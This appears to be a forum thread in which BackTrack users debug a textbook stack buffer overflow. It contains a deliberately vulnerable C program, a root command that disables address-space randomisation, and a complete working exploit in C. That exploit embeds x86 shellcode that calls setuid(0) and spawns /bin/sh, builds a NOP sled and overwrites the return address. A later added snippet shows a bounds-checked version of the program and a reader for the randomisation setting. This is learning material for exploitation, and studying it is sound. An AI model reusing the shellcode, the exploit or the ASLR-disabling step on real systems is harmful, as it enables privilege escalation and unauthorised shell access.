I was wondering if anyone could make a tutorial or a video that demonstrates a simple buffer overflow on BackTrack. I tried a lot of tutorials already, but none of them work on BackTrack.
What exactly do you need? A simple theoretical example with C source code and debugger or....something more complex (in this 2nd case I cannot help you) :)
I would like to exploit this code with a shellcode.
Code:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>   // for strcpy()

// 1024 bytes buffer
// 4 bytes to overwrite ebp
// 4 bytes to overwrite eip
// 1032 bytes :)
void viewer(char *string)
{
    char buffer[1024];
    strcpy(buffer, string);   // unbounded copy into the 1024-byte stack buffer
    printf("You have entered: %s\n", buffer);
    return;
}

int main(int argc, char *argv[])
{
    if (argc < 2)
    {
        printf("%s <something> \n", argv[0]);
        return 0;
    }
    viewer(argv[1]);
    return 0;
}
I tried various tutorials already, but none of them seem to work on BackTrack.
Like when I load an egg and then use an eggfinder the address changes all the time..
Dear UnnamedOne,
Could you please check this thread:
http://forums.remote-exploit.org/showthread.php?t=14255
We have been discussing recreating buffer overflows on known exploits; we will be happy if you join us :)
mmm....If I've not misunderstood, your problem is the randomization of memory (kernels starting from 2.6.12 add a stack protection by default).
type from shell (as root):
Code:
echo 0 > /proc/sys/kernel/randomize_va_space
it should work 'til the next reboot.....
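As an added example (not code from this thread), here is a hardened variant of the viewer() routine posted above, which refuses input that does not fit the 1024-byte buffer instead of overflowing it, together with a small reader for the randomize_va_space setting so the randomization state can be checked rather than assumed. The function names are my own; the file path is the one from the thread.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
/* Added example (not code from the thread). The posted viewer() copies
 * argv[1] into a 1024-byte stack buffer with strcpy() and no length check,
 * which is the overflow discussed above. viewer_safe() is a hardened
 * variant: it refuses input that does not fit (NUL included) instead of
 * writing past the end of the buffer. Returns 0 on success, -1 if refused. */
#define VIEWER_BUF 1024

int viewer_safe(const char *string)
{
    char buffer[VIEWER_BUF];
    size_t len = strlen(string);

    if (len >= sizeof(buffer))        /* no room for the terminating NUL */
        return -1;
    memcpy(buffer, string, len + 1);  /* bounded copy, NUL included */
    printf("You have entered: %s\n", buffer);
    return 0;
}

/* Parse the text of /proc/sys/kernel/randomize_va_space ("0\n", "1\n" or
 * "2\n"). 0 means address-space randomisation is off, which is what the
 * echo above leaves behind until reboot. Returns -1 for anything else. */
int parse_randomize_va_space(const char *contents)
{
    char *end;
    long v;

    if (contents == NULL || *contents == '\0')
        return -1;
    v = strtol(contents, &end, 10);
    if (end == contents || (*end != '\n' && *end != '\0'))
        return -1;
    return (v >= 0 && v <= 2) ? (int)v : -1;
}

/* Read the live setting; -1 if the file is unavailable (non-Linux, no /proc). */
int read_randomize_va_space(void)
{
    char buf[16];
    FILE *f = fopen("/proc/sys/kernel/randomize_va_space", "r");
    if (f == NULL)
        return -1;
    if (fgets(buf, sizeof(buf), f) == NULL) { fclose(f); return -1; }
    fclose(f);
    return parse_randomize_va_space(buf);
}
```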
I really got to thank you :) Works great now!
EDIT: Well, it works by loading an egg, but not with this code..
Code:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>   // for execl()

#define NOP 0x90 // defining the NOP
#define VUL_FILE "./vuln"

char shellcode[] =
    "\x31\xc0\x31\xdb\x31\xd2\x53\x68\x69\x74\x79\x0a\x68\x65\x63"
    "\x75\x72\x68\x44\x4c\x20\x53\x89\xe1\xb2\x0f\xb0\x04\xcd\x80"
    "\x31\xc0\x31\xdb\x31\xc9\xb0\x17\xcd\x80\x31\xc0\x50\x68\x6e" // our shellcode
    "\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x8d\x54\x24\x08\x50\x53"
    "\x8d\x0c\x24\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\xcd\x80";

unsigned long get_sp(void)
{
    // this function returns the stack pointer address, hopefully where
    // our shellcode is stored (32-bit x86; relies on eax being the return
    // register, so compile without optimisation).
    __asm__("movl %esp, %eax");
}

int main(int argc, char *argv[], char **envp)
{
    int buff = 1032; // size of the vuln buffer.
    unsigned long addr; // addr of shellcode.
    char *ptr; // used for adding nops etc.

    if(argc > 1)
        buff = atoi(argv[1]); // if the user supplies a size, use this instead.
    if((buff % 4) != 0) // if the size is not a mem addr (divisible by 4)
        buff = buff + 4 - (buff % 4); // add 4 to it, take away the remainder (makes it divisible by 4)
    if((ptr = (char *)malloc(buff)) == NULL) // check to see you allocated enough memory.
    {
        printf("Error allocating memory.\n");
        exit(0);
    }
    addr = get_sp(); // get the address of our shellcode hopefully.
    memset(ptr, NOP, buff); // fill the buffer with NOPS making our chances higher.
    memcpy(ptr + buff - strlen(shellcode) - 8, shellcode, strlen(shellcode)); // store the shellcode in the buffer.
    *(long *)&ptr[buff - 4] = addr; // make eip point to our shellcode.
    execl(VUL_FILE, "exploit example1", ptr, (char *)NULL); // execute the vuln program with our NOPS&shellcode in the buffer.
    printf("Addr: 0x%lx\n", addr); // only reached if execl() fails.
    return 0;
}
The source code appears to be ok. The only other information I have to give you is that some OSes mark the stack as "not executable" (precisely to prevent stack overflows; this is why heap overflows and return-into-libc exist :D ).
I think you should try to look at the thread posted by l1nuxant_ee...My advice is to try one of the known exploits and see what happens: if everything works, an error may be present in your code. Otherwise the stack may be "not executable" and we have to change this setting....(or we need the help of someone more expert ;) )
Don't ask me why, but I removed
Code:
addr = get_sp(); // get the address of our shellcode hopefully.
and changed
Code:
unsigned long addr; // addr of shellcode.
to
Code:
unsigned long addr = get_sp(); // addr of shellcode.
and now the code works fine :)
Time to learn remote buffer overflow I think now :)
Haha! Cool!! We don't ask about this mystery of C, but we are happy that everything now works. Great! :D